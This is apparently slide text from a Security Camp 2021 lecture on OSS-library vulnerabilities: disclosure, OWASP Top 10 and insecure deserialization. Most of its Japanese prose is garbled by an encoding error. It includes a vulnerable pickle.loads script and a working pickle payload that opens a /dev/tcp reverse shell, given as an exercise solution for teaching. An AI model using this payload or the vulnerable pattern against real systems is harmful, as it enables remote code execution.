趣味と実益のための著名なOSSライブラリ起因の脆弱性の探求/seccamp2021-b5

झຯͱ࣮ӹͷͨΊͷ ஶ໊ͳ044ϥΠϒϥϦىҼͷ੬ऑੑͷ୳ٻ ηΩϡϦςΟɾΩϟϯϓશࠃେձΦϯϥΠϯ גࣜձࣾΞΧπΩ খ஛ɹହҰ

ࣗݾ঺հ w খ஛ɹହҰ w (JU)VC5XJUUFSULNSV w ॴଐגࣜձࣾΞΧπΩ w ੬ऑੑ਍அ w
νʔτରࡦπʔϧ։ൃͳͲ

ࣗݾ঺հ ஶॻ

ηΩϡϦςΟɾΩϟϯϓͱͳ͔Α͠ʂ w ηΩϡϦςΟɾΩϟϯϓશࠃେձࢀՃ w ηΩϡϦςΟɾϛχΩϟϯϓJOژ౎νϡʔλʔ w ηΩϡϦςΟɾϛχΩϟϯϓJOਆށνϡʔλʔ w ηΩϡϦςΟɾΩϟϯϓશࠃେձΦϯϥΠϯߨࢣ w
ηΩϡϦςΟɾΩϟϯϓશࠃେձΦϯϥΠϯߨࢣ ࣗݾ঺հ

#MBDL)BU"STFOBMͱ΋ͳ͔Α͠ʢʁʣ w #MBDL)BU64""STFOBM w "OESPJEΞϓϦ޲͚ϝϞϦվ͟ΜπʔϧʮBQLNFEJUʯΛൃද w #MBDL)BU64""STFOBM w J04ΞϓϦ޲͚ϝϞϦվ͟ΜπʔϧʮJQBNFEJUʯΛൃද w
#MBDL)BU&VSPQF"STFOBM w 5#" ࣗݾ঺հ

ຊ೔ͷߨٛʹ͍ͭͯ w ԋश؀ڥߏஙͷͨΊͷίϚϯυͷ৘ใ͕εϥΠυʹࡌ͍ͬͯΔͷͰίϐϖͰ ߏஙͰ͖ΔΑ͏ʹεϥΠυ͸4MBDL্Ͱ഑෍ͯ͋͠Γ·͢ w ԋशͷͱ͖͸֤ࣗͰεϥΠυ͔͞ͷ΅Γͭͭ΍ͬͯ΋Β͑Δͱ🙏 w ޙ೔ެ։൛Λ4QFBLFS%FDLͰެ։͢ΔͷͰݟֶ࿮ͷਓͨͪ͸ ଴͍ͬͯͯͩ͘͞🙇
w (JU)VCϦϙδτϦ w IUUQTHJUIVCDPNULNSVTFDDBNQC

ຊ೔ͷߨٛʹ͍ͭͯ

ຊ೔ͷߨٛʹ͍ͭͯ ӕͰ͢ʢҰ෦ʣ

ຊ೔ͷߨٛʹ͍ͭͯ w ߨٛ֓ཁΛߟ͑ͨͷ͸໿ϲ݄લʜ w ౰࣌͸9.-ύʔαʹओ࣠Λ͓͍ͨߨٛΛ͠Α͏ͱࢥ͍ͬͯͨ w ͋ͱͰߟ͑௚͢ͱগ͠είʔϓ͕ڱ͍ w ͱ͍͏͜ͱͰɺѻ͏੬ऑੑΛ૿΍͍ͯ͠·͢ʂ

ͦ΋ͦ΋੬ऑੑͱ͸ w ιϑτ΢ΣΞʹ͓͚ΔηΩϡϦςΟ্ͷ໰୊Օॴ w ιϑτ΢ΣΞͷྫϥΠϒϥϦɺ04ɺ8FCΞϓϦέʔγϣϯͳͲ w ໰୊ՕॴΛ߈ܸ͞ΕΔ͜ͱͰɺຊདྷͷػೳΛଛͳ͍ɺϢʔβ͕ෆརӹΛඃΔ w ৘ใͷ࿙ӮͳͲ w
ˠ੬ऑੑΛ߈ܸऀΑΓૣ͘ൃݟͯ͠मਖ਼͍ͯ͘͠ඞཁ͕͋Δʂʂ

ຊ೔ͷߨٛͷྲྀΕ w ࣾձʹ͓͚Δ੬ऑੑൃݟϓϩηεʢલ࠲ʣ w ҆શͰͳ͍σγϦΞϥΠθʔγϣϯ w 9.-ύʔαʹର͢Δ߈ܸख๏ w ٕज़ͱ޲͖߹͏࢟੎ͷ࿩ʢ͍͍࿩ʣ

ୈ̍ষ ࣾձʹ͓͚Δ੬ऑੑൃݟϓϩηε

ࣾձʹ͓͚Δ੬ऑੑൃݟϓϩηε w اۀͰߦΘΕΔ੬ऑੑ਍அ w ࡏ໺ͷΤϯδχΞʹΑΔ੬ऑੑใࠂ w ։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ

اۀͰߦΘΕΔ੬ऑੑ਍அ w ηΩϡϦςΟΤϯδχΞ͕੬ऑੑ͕ͳ͍͔֬ೝ͢Δ͜ͱΛ੬ऑੑ਍அͱ͍͏ w αʔϏεͷϦϦʔεલ΍ɺ௥ՃͰେ͖ͳػೳΛ࣮૷ͨ͠ࡍʹߦΘΕΔ w 8FCΞϓϦέʔγϣϯ΍εϚϗΞϓϦɺ*P5ػثͳͲ͕ର৅ w ηΩϡϦςΟϕϯμʹ֎஫ɺ·ͨ͸಺੡Ͱ࣮ࢪ͞ΕΔ ࣾձʹ͓͚Δ੬ऑੑൃݟϓϩηεʢͦͷ̍ʣ

اۀͰߦΘΕΔ੬ऑੑ਍அ ੬ऑੑ਍அͷ༷ࢠʢʣ w ੬ऑੑΛൃݟ͢Δʹ͸༷ʑͳ؍఺͕͋Δ͕ɺΞϓϦέʔγϣϯͱαʔόؒͷ ௨৴Λ֬ೝɾվ͟Μ͢Δ͜ͱͰൃݟͰ͖Δ੬ऑੑ͕ଟ͍ ϓϩΩγπʔϧΛ࢖ͬͯ௨৴಺༰Λ֬ೝ͢Δ ηΩϡϦςΟΤϯδχΞ αʔό ਍அର৅

اۀͰߦΘΕΔ੬ऑੑ਍அ ੬ऑੑ਍அͷ༷ࢠʢʣ w ηΩϡϦςΟΤϯδχΞ͕ݟ͚ͭͨ੬ऑੑΛ։ൃऀʹใࠂ w ։ൃऀ͕ΞϓϦέʔγϣϯΛमਖ਼ ηΩϡϦςΟΤϯδχΞ ใࠂΛड͚ͯ੬ऑੑΛमਖ਼͢Δ։ൃऀ ηΩϡΞͳঢ়ଶͰαʔϏεΛϦϦʔε

ࡏ໺ͷΤϯδχΞʹΑΔ੬ऑੑใࠂ w ݚڀ໨తͰ͋ͬͨΓझຯͰ͋ͬͨΓͰɺੈͷதʹެ։͞Ε͍ͯΔιϑτ΢Σ Ξͷ੬ऑੑΛউखʹݟ͚ͭΔਓ͕͍ͨͪΔ w ൃݟͨ͠੬ऑੑ͕ެ։͞ΕΔͱݟ͚ͭͨਓͷ੒ՌͱͳΔͷͰ͏Ε͍͠ w ͓ۚ💰͕΋Β͑Δ੍౓΋͋Δ ࣾձʹ͓͚Δ੬ऑੑൃݟϓϩηεʢͦͷ̎ʣ

ࡏ໺ͷΤϯδχΞʹΑΔ੬ऑੑใࠂ ใࠂऀʹใ঑ۚΛ౉͢όάό΢ϯςΟ w ࣗࣾͷ੡඼ͷ੬ऑੑΛใࠂͯ͘͠Εͨਓʹ੬ऑੑͷӨڹ౓ʹ४ͯ͡ใ঑ۚΛ ౉੍͢౓ w ੬ऑੑΛѱ༻͞ΕΔΑΓɺใ঑ۚΛ͔͚ͯͰ΋ใࠂͯ͠΋Βͬͨ΄͏͕͍͍ w ੬ऑੑ਍அͱҧͬͯຊ൪؀ڥʹ߈ܸߦҝ͕ߦΘΕΔ w
اۀ͕ηΩϡϦςΟରࡦʹ஫ྗ͍ͯ͠Δ͜ͱͷ13ʹ΋ͭͳ͕Δ

ࡏ໺ͷΤϯδχΞʹΑΔ੬ऑੑใࠂ ஶ໊όάό΢ϯςΟαʔϏε w )BDLFS0OF w 4UBSCVDLTɺ/JOUFOEPɺ-*/&ɺ50:05"ͳͲ w CVHDSPXE w *OEFFEɺ/FUqJYɺ5FTMBɺ.BTUFSDBSEͳͲ
w #VH#VOUZKQ w $IBUXPSLɺCJUCBOLͳͲ

ࡏ໺ͷΤϯδχΞʹΑΔ੬ऑੑใࠂ *1"΁ͷใࠂ w όάό΢ϯςΟΛ΍͍ͬͯͳ͍αʔϏε΍ɺ044ͷιϑτ΢ΣΞͷ੬ऑੑΛ ݟ͚ͭͯ͠·͏ʢݟ͚͍ͭͨʢʁʣʣ͜ͱ΋͋Δ w ͦΜͳͱ͖͸*1"ʹใࠂ͢Δͱ։ൃऀ΁ͷ࿈བྷΛߦͬͯ͘ΕΔ w ੬ऑੑؔ࿈৘ใͷಧग़ड෇ ʢIUUQTXXXJQBHPKQTFDVSJUZWVMOSFQPSUʣ
w ։ൃऀͱ௚઀΍ΓऔΓ͢ΔͱᎍΊΔՄೳੑ͕͋Δ

ࡏ໺ͷΤϯδχΞʹΑΔ੬ऑੑใࠂ *1"΁ͷใࠂ IUUQTJTFDWVMGPSNJQBHPKQJQBWVMNBJOJOEFYIUNM

ࡏ໺ͷΤϯδχΞʹΑΔ੬ऑੑใࠂ ใࠂͨ͠੬ऑੑʹ$7&͕ͭ͘͜ͱ΋ w $7&ʢ$PNNPO7VMOFSBCJMJUJFTBOE&YQPTVSFTʣɿڞ௨੬ऑੑࣝผࢠ w .*53&͕ࣾ৘ใڞ༗ͷͨΊʹ֤੬ऑੑʹݻ༗ͷ$7&*%ΛׂΓৼ͍ͬͯΔ w ੲɺ֤छ੡඼ϕϯμʔ΍ηΩϡϦςΟϕϯμʔ͕ɺ੬ऑੑʹରͯ͠ಠࣗʹ ໊લΛ෇͚͍ͯͨ w
೥ʹ$7&͕ొ৔͠ɺ੬ऑੑ৘ใͷൺֱΛ༰қʹߦ͑ΔΑ͏ʹͳͬͨ w ݟ͚ͭͨ੬ऑੑʹ$7&͕ͭ͘ͱࣗຫͰ͖Δ

ࡏ໺ͷΤϯδχΞʹΑΔ੬ऑੑใࠂ ੬ऑੑʹ$7&͕ͭ͘·ͰͷྲྀΕ w ೔ຊͰ͸*1"ͱ+1$&35$$͕.*53&ࣾͱ࿈ܞͯ͠ݟ͔ͭͬͨ੬ऑੑʹରͯ͠ $7&Λ࠾൪͢ΔऔΓ૊ΈΛߦ͍ͬͯΔ

։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ w ͜͜·Ͱݟ͖ͯͨͱ͓Γɺ੬ऑੑ͸೔ʑൃݟ͞Ε͍ͯΔ w ੬ऑੑͷ͋Διϑτ΢ΣΞΛ༻͍͍ͯΔ͚ͩͰ੬ऑੑͱͳΓ͏Δ ࣾձʹ͓͚Δ੬ऑੑൃݟϓϩηεʢͦͷ̏ʣ IUUQTXXXJQBHPKQTFDVSJUZWVMOSFQPSUWVMORIUNM

։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ w ਵ࣌ൃݟ͞ΕΔϥΠϒϥϦ΍04౳ͷ੬ऑੑʹ͸ϦϦʔεલʹ࣮ࢪ͢Δ ੬ऑੑ਍அͰ͸ରԠͰ͖ͳ͍ w ӡ༻޻ఔͰ੬ऑੑͷରԠΛ͢Δඞཁ͕͋Δ w ੬ऑੑͷରࡦํ๏͕ެ։͞ΕΔલʹɺ߈ܸ͕ߦΘΕΔ͜ͱ΋͋ΔʢθϩσΠ ߈ܸʣ w
Өڹ౓͕ߴ͍੬ऑੑ͕ެ։͞Εͨ৔߹͸ਝ଎ʹରԠ͢Δඞཁ͕͋Δ ࣾձʹ͓͚Δ੬ऑੑൃݟϓϩηεʢͦͷ̏ʣ

։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ w ӡ༻࣌ʹ੬ऑੑͷ͋Διϑτ΢ΣΞ͕͋Ε͹Ξοϓσʔτ͍͖͍ͯͨ͠ w ˠαʔό಺ͷιϑτ΢ΣΞΛ୳ࡧ͢Δ7VMT w ˠίϯςφ಺ͷιϑτ΢ΣΞΛ୳ࡧ͢Δ5SJWZ ࣾձʹ͓͚Δ੬ऑੑൃݟϓϩηεʢͦͷ̏ʣ

։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ αʔό಺ͷιϑτ΢ΣΞΛ୳ࡧ͢Δ7VMT w 7VMTʢ76-OFSBCJMJUZ4DBOOFSʣ w IUUQTHJUIVCDPNGVUVSFBSDIJUFDUWVMT w ϑϡʔνϟʔגࣜձ͕ࣾ։ൃ͍ͯ͠Δ044ͷ੬ऑੑεΩϟφ w αʔό಺Ͱ༻͍͍ͯΔιϑτ΢ΣΞʹ੬ऑੑΛؚΉόʔδϣϯͷ΋ͷ͕ͳ͍͔
֬ೝ

։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ 7VMTͷ࢓૊Έ IUUQTHJUIVCDPNGVUVSFBSDIJUFDUWVMT

։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ ίϯςφ಺ͷιϑτ΢ΣΞΛ୳ࡧ͢Δ5SJWZ w "RVB4FDVSJUZ͕։ൃ͍ͯ͠Δ044ͷ੬ऑੑεΩϟφ w IUUQTHJUIVCDPNBRVBTFDVSJUZUSJWZ w %PDLFSΠϝʔδΛεΩϟϯͰ͖Δ w ϝϯς͞Ε͍ͯͳ͍ެࣜ%PDLFSΠϝʔδ΋ଟ͍
w "4JNQMFBOE$PNQSFIFOTJWF7VMOFSBCJMJUZ4DBOOFSGPS$POUBJOFST 4VJUBCMFGPS$* w $*ʹ૊ΈࠐΉ͜ͱ΋Ͱ͖ͯศར

։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ Ϋϥ΢υ؀ڥͷઃఆ΋νΣοΫ͍ͨ͠ w "84΍($1ͷઃఆϛεʹΑΔ੬ऑੑ΋͋Δ w ೔ʑɺΠϯϑϥͷઃఆ͸มΘ͍ͬͯ͘ͷͰɺϦϦʔεલͷ੬ऑੑ਍அͰ͸ ๷͛ͳ͍ w ੬ऑͳ෦෼Λ߈ܸऀ͸CPUΛ༻͍ͯߴ଎ʹ୳ͯ͘͠Δ

։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ 4όέοτ͸Α͘ૂΘΕ͍ͯΔ w Α͘ૂΘΕ͍ͯΔ"84ͷ࢓૊Έͷͻͱͭʹ4όέοτ͕͋Δ w ਖ਼໊ࣜশ"NB[PO4 "NB[PO4JNQMF4UPSBHF4FSWJDF w Πϯλʔωοτܦ༝Ͱར༻Ͱ͖ΔετϨʔδαʔϏε
w 4όέοτσʔλͷஔ͖৔ॴ w ੩తϑΝΠϧϗεςΟϯά͕Ͱ͖8FCαʔόͱͯ͠΋࢖༻Ͱ͖Δ w ༷ʑͳσʔλ͕ஔ͔ΕΔͷͰɺσʔλ͕ཉ͍͠߈ܸऀʹૂΘΕΔ

։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ ࡢࠓͷΠϯγσϯτࣄྫ w 4όέοτઃఆϛεʹΑΔԯສੈଳҎ্ͷݸਓ৘ใ࿙Ӯ w ΧϦϑΥϧχΞΛڌ఺ͱ͢Δσʔλ෼ੳձࣾͰ͋Δ"MUFSZY͔ࣾΒͷ࿙Ӯ w IUUQTXXXUSFOENJDSPDPNWJOGPQMTFDVSJUZOFXTWJSUVBMJ[BUJPOBOEDMPVEEBUBPONJMMJPOVT IPVTFIPMETFYQPTFEEVFUPNJTDPOpHVSFEBXTTCVDLFU w
ެ։4όέοτΛɺϚϧ΢ΣΞΛ࢓ࠐΜͩঢ়ଶͰ্ॻ͖͢Δ߈ܸऀ w ޡͬͯॻ͖ࠐΈΛڐՄ͞Ε͍ͯΔόέοτʹϚϧ΢ΣΞΛॻ͖ࠐΈ w IUUQTXXXNDBGFFDPNCMPHTFOUFSQSJTFDMPVETFDVSJUZNDBGFFEJTDPWFSTHIPTUXSJUFSBQFSWBTJWFBXTT NBOJOUIFNJEEMFFYQPTVSF

։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ "84$POpH w "84ͷ֤छઃఆ͕ϧʔϧͲ͓Γʹઃఆ͞Ε͍ͯΔ͔ධՁ͢ΔαʔϏε w ެ։͞Ε͍ͯΔηΩϡϦςΟάϧʔϓ͕ଘࡏ͠ͳ͍͔ʁ w 4όέοτ͕ެ։ઃఆʹͳ͍ͬͯͳ͍͔ʁ w ެ։͞Ε͍ͯΔ&#43%4εφοϓγϣοτ͕ଘࡏ͠ͳ͍͔ʁ

ͲͷΑ͏ͳ੬ऑੑ͕ݟ͔ͭΔͷ͔

08"415PQ 08"41ͱ͸ w 08"41ʢ0QFO8FC"QQMJDBUJPO4FDVSJUZ1SPKFDUʣ͸ηΩϡϦςΟͷ ܒ໤ͱීٴΛ໨తͱͨ͠/10ஂମ w ੈքதʹڌ఺͕͋Δ w ೔ຊʹ΋͋ͬͯυΩϡϝϯτΛެ։ͨ͠ΓษڧձΛओ࠵ͨ͠Γ͍ͯ͠Δ w
IUUQTPXBTQPSHXXXDIBQUFSKBQBO w 08"415PQ͸8FCΞϓϦέʔγϣϯʹ͓͍ͯ Α͘ݟ͔ͭΔ੬ऑੑϥϯΩϯά

08"415PQʢʣ ؚ·ΕΔ੬ऑੑҰཡ w ΠϯδΣΫγϣϯ߈ܸ w ೝূͷෆඋ w ػඍͳ৘ใͷ࿐ग़ w 99&
w ΞΫηε੍ޚͷෆඋ w ෆద੾ͳηΩϡϦςΟઃఆ w 944 w ҆શͰͳ͍σγϦΞϥΠθʔγϣϯ w ط஌ͷ੬ऑੑͷ͋Δίϯϙʔωϯτ ͷ࢖༻ w ෆे෼ͳϩΪϯάͱϞχλϦϯά

08"415PQʢʣ ؚ·ΕΔ੬ऑੑҰཡ IUUQTHJUIVCDPN08"415PQCMPCNBTUFSEPDT"@@*OUSPEVDUJPONE

08"415PQʢʣ ؚ·ΕΔ੬ऑੑҰཡ w ΞΫηε੍ޚͷෆඋ w ෆద੾ͳ҉߸Խ w ΠϯδΣΫγϣϯ w ҆શͰͳ͍ઃܭ
w ෆద੾ͳηΩϡϦςΟઃఆ w ੬ऑͳݹ͍ίϯϙʔωϯτ w ෆద੾ͳ*EFOUJpDBUJPOͱ "VUIFOUJDBUJPO w ιϑτ΢ΣΞͱσʔλͷ੔߹ͷෆඋ w ηΩϡϦςΟϩάͱϞχλϦϯάͷෆ උ w αʔόʔαΠυϦΫΤετϑΥʔδΣϦ ʢ443'ʣ

ߨٛͰѻ͏੬ऑੑ w ୊झຯͱ࣮ӹͷͨΊͷஶ໊ͳ044ϥΠϒϥϦىҼͷ੬ऑੑͷ୳ٻ w 044ϥΠϒϥϦىҼͱ͍ͬͯ΋෯޿͍ʜ w ֤ϓϩάϥϛϯάݴޠʹσϑΥϧτͰଘࡏ͢ΔϥΠϒϥϦىҼͷ੬ऑੑʹয ఺Λ౰ͯΔˠ࡞Γࠐ·Ε΍͍͢ʂʂ w ҆શͰͳ͍σγϦΞϥΠθʔγϣϯ
w 9.-ύʔαؔ࿈

08"415PQ 08"41ʹΑΔ΍ΒΕ؀ڥ w 08"41͸੬ऑੑΛ࡞Γࠐ·Εͨԋश༻ͷΞϓϦͷެ։΋͍ͯ͠Δ w +VJDF4IPQʢIUUQTHJUIVCDPNCLJNNJOJDIKVJDFTIPQʣ w 3BJMT(PBUʢIUUQTHJUIVCDPN08"41SBJMTHPBUʣ w %74"ʢIUUQTHJUIVCDPN08"41%74"ʣ
w ͳͲ w ษڧʹͳΔͷͰ΍ͬͯΈ͍ͯͩ͘͞ʂ

ୈ̎ষ ҆શͰͳ͍σγϦΞϥΠθʔγϣϯ

γϦΞϥΠζͱσγϦΞϥΠζ γϦΞϥΠζͱ͸ w γϦΞϥΠζ ഑ྻ΍ΫϥεͳͲͷΦϒδΣΫτΛόΠτྻܗࣜͷσʔλ΁มߋ͢Δ͜ͱ w σγϦΞϥΠζʢΞϯγϦΞϥΠζʣ γϦΞϥΠζ͞ΕΔ͜ͱʹΑͬͯੜ੒͞ΕͨόΠτྻܗࣜͷσʔλΛ ΦϒδΣΫτ΁໭͢͜ͱ w
༻్ ෳࡶͳσʔλ΍ΦϒδΣΫτͳͲͷεφοϓγϣοτΛऔΔ ϑΝΠϧ΍%#ʹอଘ͢Δࡍ΍ɺωοτϫʔΫΛ௨ͯ͡ૹ৴͢ΔͳͲ

1ZUIPOͰͷγϦΞϥΠζσγϦΞϥΠζ w QJDLMFϞδϡʔϧͷQJDLMFEVNQT ɺQJDLMFMPBET ͳͲͰ γϦΞϥΠζσγϦΞϥΠζͰ͖Δ γϦΞϥΠζͱσγϦΞϥΠζ { 'name':
'ηΩϡϦςΟɾΩϟϯϓશࠃେձ2021 ΦϯϥΠϯ', 'year': 2021, 'place': ‘online' } b'\x80\x04\x95k\x00\x00\x00\x00\x00\x00\x00}\x94( \x8c\x04name\x94\x8cA\xe3\x82\xbb\xe3\x82\xad\xe3 \x83\xa5\xe3\x83\xaa\xe3\x83\x86\xe3\x82\xa3\xe3\ x83\xbb\xe3\x82\xad\xe3\x83\xa3\xe3\x83\xb3\xe3\x 83\x97\xe5\x85\xa8\xe5\x9b\xbd\xe5\xa4\xa7\xe4\xb c\x9a2021 \xe3\x82\xaa\xe3\x83\xb3\xe3\x83\xa9\xe3\x82\xa4\ xe3\x83\xb3\x94\x8c\x04year\x94M\xe5\x07\x8c\x05p lace\x94\x8c\x06online\x94u.’

1)1ͰͷγϦΞϥΠζσγϦΞϥΠζ w ඪ४ؔ਺ͷTFSJBMJ[F ͱVOTFSJBMJ[F ͰγϦΞϥΠζσγϦΞϥΠζͰ͖Δ γϦΞϥΠζͱσγϦΞϥΠζ array( 'name'=>'ηΩϡϦςΟɾΩϟϯϓશࠃେձ2021 ΦϯϥΠϯ’,
'year'=>2021, 'place'=>'online' ) a:3:{s:4:"name";s:65:"ηΩϡϦςΟɾΩϟϯϓશࠃେձ 2021 ΦϯϥΠ ϯ”;s:4:”year";i:2021;s:5:"place";s:6:"online";}

҆શͰͳ͍σγϦΞϥΠθʔγϣϯ Ϣʔβ͔Βͷೖྗ஋͸ཁ஫ҙ w Ϣʔβ͔Βͷೖྗ஋Λͦͷ··σγϦΞϥΠζ͍ͯ͠Δͱɺ ੜ੒͞ΕΔΦϒδΣΫτΛϢʔβ͕ίϯτϩʔϧͰ͖ͯ͠·͏ ࡉ޻͞ΕͨσʔλΛૹ৴ ߈ܸऀ͕ࢦఆͨ͠ ΦϒδΣΫτ͕ੜ੒͞ΕΔ

҆શͰͳ͍σγϦΞϥΠθʔγϣϯ ϚδοΫϝιουΛ࢖͏ w ϚδοΫϝιουಛఆͷΠϕϯτ࣌ʹ҉໧తʹ࣮ߦ͞ΕΔϝιου w ϓϩάϥϛϯάݴޠ಺෦Ͱ࣮ߦ͞Ε͍ͯΔ w ֤ݴޠʹΑͬͯҟͳΔ w ΦϒδΣΫτ͕ੜ੒͞ΕΔࡍʹݺͼग़͞ΕΔϚδοΫϝιουΛ߈ܸʹར༻Մೳ
w ΦϒδΣΫτ͕ੜ੒͞ΕΔࡍʹ࣮ߦ͢ΔίʔυΛࢦఆͰ͖Δ w ˠϢʔβ͕೚ҙίʔυΛ࣮ߦՄೳʂ

҆શͰͳ͍σγϦΞϥΠθʔγϣϯ 1ZUIPOެࣜυΩϡϝϯτ IUUQTEPDTQZUIPOPSHKBMJCSBSZQJDLMFIUNM

҆શͰͳ͍σγϦΞϥΠθʔγϣϯ 1)1ެࣜυΩϡϝϯτ IUUQTXXXQIQOFUNBOVBMKBGVODUJPOVOTFSJBMJ[FQIQ

҆શͰͳ͍σγϦΞϥΠθʔγϣϯ ۩ମతͳ߈ܸํ๏ʢ1ZUIPOͷ৔߹ʣ w 1ZUIPOͰγϦΞϥΠζσγϦΞϥΠζ͸QJDLMFԽVOQJDLMFԽͱݺ͹Ε͍ͯΔ w QJDLMFEVNQT Λ࢖ͬͯΦϒδΣΫτΛQJDLMFԽ w ߈ܸʹ࢖͑ΔϚδοΫϝιουͱͯ͠@@SFEVDF@@ ϝιου͕஌ΒΕ͍ͯΔ
w ݺͼग़͠ՄೳͳΦϒδΣΫτͱҾ਺Λλϓϧͱͯ͠ࢦఆ͢Δͱ࣮ߦͯ͘͠ΕΔ w ˠ@@SFEVDF@@ ϝιουͰPTTZTUFN Λ࣮ߦ͢ΔΦϒδΣΫτΛQJDLMFԽͯ͠ ૹ৴͢Δ͜ͱͰ೚ҙίʔυ࣮ߦʹ࣋ͪࠐΊΔʂ

ࣄલ՝୊݉બߟ՝୊& w 1ZUIPOʹ͸QJDLMFͱ͍͏ඪ४Ϟδϡʔϧ͕͋Γ·͢ɻQJDLMFͷެࣜυΩϡϝϯτʹهࡌ͞ Ε͍ͯΔΑ͏ʹɺQJDLMFͰ৴པͰ͖ͳ͍஋ΛσγϦΞϥΠζ͢Δ͜ͱ͸੬ऑੑͷݪҼͱͳ Γಘ·͢ɻͦͷཧ༝͓Αͼ߈ܸख๏ʹ͍ͭͯɺҎԼͷখ໰ ʹճ౴͍ͯͩ͘͠͞ɻ w খ໰
Կނɺ੬ऑੑͱͳΔͷ͔Λઆ໌͍ͯͩ͘͠͞ʢඞਢճ౴ʣ w খ໰ ҎԼͷ1ZUIPOͷιʔείʔυʹ͸্هͷ੬ऑੑ͕ଘࡏ͠·͢ɻ ͜ͷ੬ऑੑΛ༻͍ͯɺ5$1ͷ൪ϙʔτʹର͢ΔϦόʔεγΣϧΛ࡞੒͍ͯͩ͘͠͞ɻ OFUDBUͰ൪ϙʔτΛ଴ͪड͚͓͖ͯɺ઀ଓཱ͕֬ͨ͠ޙɺMTͳͲͷίϚϯυΛଧͪࠐ Έ݁Ռ͕ฦͬͯ͘Ε͹ਖ਼ղͰ͢ɻʢҰ෦লུʣʢඞਢճ౴ʣ ໰୊จ

બߟ՝୊& #!/usr/bin/env python3 # coding: UTF-8 import sys import
base64 import pickle args = sys.argv if len(args) != 2: print('ୈҰҾ਺ʹBase64Τϯίʔυ͞ΕͨจࣈྻΛࢦఆ͍ͯͩ͘͠͞') try: data = base64.urlsafe_b64decode(args[1]) deserialized = pickle.loads(data) print('deserialized: {0}'.format(deserialized)) except: print('Failed to deserialize') ໰୊ίʔυ

બߟ՝୊&ղઆ w λʔήοτͷ୺຤͔Β߈ܸऀ͕଴ͪड͚͍ͯΔ୺຤΁ͱ઀ଓ͠ʹ͍͘͜ͱ Ͱɺ߈ܸऀ͕λʔήοτͷ୺຤্Ͱಈ࡞͢ΔγΣϧΛૢ࡞Ͱ͖ΔΑ͏ʹ͢Δ ςΫχοΫΛϦόʔεγΣϧͱݺͿ ϦόʔεγΣϧͱ͸ ԿΒ͔ͷํ๏ͰϦόʔεγΣϧΛߦ͏ίʔυΛ࣮ߦͤ͞Δ ߈ܸऀ͕଴ͪड͚Δ୺຤ʹ઀ଓ ೚ҙίʔυΛ࣮ߦ

બߟ՝୊&ղઆ w αʔό্Ͱ೚ҙίʔυ࣮ߦʹ੒ޭͨ͠ͱͯ͠΋݁Ռ͕Ϩεϙϯε΍6*্ʹग़ͯ ͘Δͱ͸ݶΒͳ͍ɻ w ϦόʔεγΣϧʹΑͬͯ೚ҙίʔυ࣮ߦͷ݁ՌΛ֬ೝͰ͖Δ ϦόʔεγΣϧͷ༻్ ೚ҙίʔυ࣮ߦͰ͖Δ͔΋͠Εͳ͍ίʔυ

બߟ՝୊&ղઆ w ୈҰҾ਺ʹࢦఆ͞Εͨ#BTFจࣈྻΛσίʔυ্ͨ͠ͰVOQJDLMFԽ͍ͯ͠Δ w QJDLMFԽ্ͨ͠Ͱ#BTFʹΤϯίʔυͨ͠จࣈྻΛࢦఆ͢Δ͜ͱͰ VOQJDLMF࣌ʹੜ੒͞ΕΔΦϒδΣΫτΛ੍ޚͰ͖Δ w ϚδοΫϝιουΛ࢖ͬͯϦόʔεγΣϧΛੜ੒͢ΔίʔυΛ࣮ߦ͢Ε͹ ղ͚Δ
ํ਑

બߟ՝୊&ղઆ #!/usr/bin/env python3 # coding: UTF-8 import pickle import
socket import os import base64 class GetReverseShell(object): def __reduce__(self): return (os.system, ('/bin/sh </dev/tcp/localhost/1234 >&0 2>&0',)) payload = pickle.dumps(GetReverseShell()) print(base64.urlsafe_b64encode(payload)) ϖΠϩʔυੜ੒

҆શͰͳ͍σγϦΞϥΠθʔγϣϯ ରࡦ w ۃྗγϦΞϥΠζσγϦΞϥΠζΛߦΘͳ͍Α͏ʹ͢Δ w ୅ΘΓʹ+40/΍:".-ͳͲͷϑΥʔϚοτΛར༻͢Δ w γϦΞϥΠζσγϦΞϥΠζΛߦ͏ඞཁ͕͋Δ৔߹͸ɺσδλϧॺ໊Λ෇༩ ͠ɺվ͟ΜͰ͖ͳ͍Α͏ʹ͢Δ

҆શͰͳ͍σγϦΞϥΠθʔγϣϯ ߈ܸํ๏ʢ1)1ͷ৔߹ʣ w 1)1Ͱ͸TFSJBMJ[F Λ࢖ͬͯΦϒδΣΫτΛγϦΞϥΠζՄೳ w ߈ܸʹ࢖͑ΔϚδοΫϝιουͱͯ࣍͠ͷ͕̎ͭ༗໊ w @@XBLFVQ ϝιου
w @@EFTUSVDU ϝιου w γϦΞϥΠζ͞ΕͨจࣈྻΛVOTFSJBMJ[F ʹ౉͢͜ͱͰΦϒδΣΫτΛૠೖ ͢Δ߈ܸख๏੬ऑੑΛ1)10CKFDU*OKFDUJPOͱ͍͏

1SPQFSUZ0SJFOUFE1SPHSBNNJOH 1)1ಛ༗ͷςΫχοΫ w ϚδοΫϝιουΛ࣋ͭΫϥεΛ௨ͯ͡௚઀͸࣮ߦͰ͖ͳ͍ϝιουΛ ࣮ߦ͢Δ߈ܸख๏ w ΦϒδΣΫτͷϓϩύςΟʢΫϥεͷϝϯόม਺ʣΛ੍ޚ͠ɺ ΨδΣοτͱݺ͹ΕΔஅยతͳίʔυΛ࣮ߦ͠ɺ࠷ऴతͳ໨తΛୡ੒͢Δ w λʔήοτ಺෦ͷίʔυΛ࠶ར༻͢Δ$PEF3FVTF"UUBDLͷҰछ
w ଞʹ͸301ɺ3FUVSOJOUPMJCD͕͋Δ

